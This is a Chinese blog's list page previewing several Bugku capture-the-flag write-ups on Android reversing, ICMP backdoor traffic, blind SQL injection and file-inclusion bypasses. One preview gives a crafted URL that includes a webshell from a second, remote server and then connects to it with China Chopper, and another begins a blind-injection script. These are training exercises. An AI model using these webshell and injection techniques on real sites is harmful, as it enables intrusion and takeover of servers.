- 博客(5)
- 资源 (1)
- 收藏
- 关注
原创 bugku 安卓逆向 First_Mobile(xman)
首先这题真的在bugku上,我是迷了好久因为格式是XMAN{*}我一直以flag提交难怪不成功下面用python写了个脚本按照源码的逻辑写的import timecoretu = [23,22,26,26,25,25,25,26,27,28,30,30,29,30,32,32]print('XMAN{',end='')for indexnum,i in enumerate(core...
2019-02-27 21:18:44
1801
原创 Bugku 分析 特殊后门(wireshark流量包分析)
我们根据题目提示可以看到提示我们flag可能在这几个协议中我们打开wireshark分析下虽然我是直接一开始就搜的icmp....我们在往下看,是不是看的有点眼熟接下来我们顺着一个一个看,便可以得到flag{Icmp_backdoor_can_transfer-some_infomation}当你检视其他协议的时候你会发现包很正常arp的包也是正常的包。其实...
2019-02-21 21:51:38
2709
原创 bugku文件上传2(湖湘杯) 远程包含链接种马
我们可以在自己已经种马的远程的公网地址写这么一个文件然后我们就可以骑马了http://123.206.87.240:9011/?op=http://123.206.87.240:8010/agf&imagekey=7b94ef7c76bd383c4b7e39b17f86e9619f6370e9只需要这么构造就行。然后上菜刀就行 ...
2019-02-19 15:23:36
581
3
转载 bugku login2(skctf) shell盲注
首先说下是看了这篇文章以后根据大佬的wp写的脚本。脚本也是别的地方抄的改的https://www.cnblogs.com/blili/p/9045280.html如何绕过上面这篇写的很详细了可以参考上面这篇绕开登录,笔者做了测试盲注了数据库skctf发现作者很gou项里面没有数据下面附上盲注的脚本:import requestsurl = 'http://123.206.31....
2019-02-18 23:38:13
3507
1
原创 Bugku 文件包含2 writeup 绕过过滤
首先附上网站源码http://123.206.31.85:49166/index.php<!-- upload.php --><?php if(!isset($_GET['file'])) { header('Location: ./index.php?file=hello.php'); exit(); }...
2019-02-18 02:09:52
1783
LM HASH 计算工具
2017-06-15
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人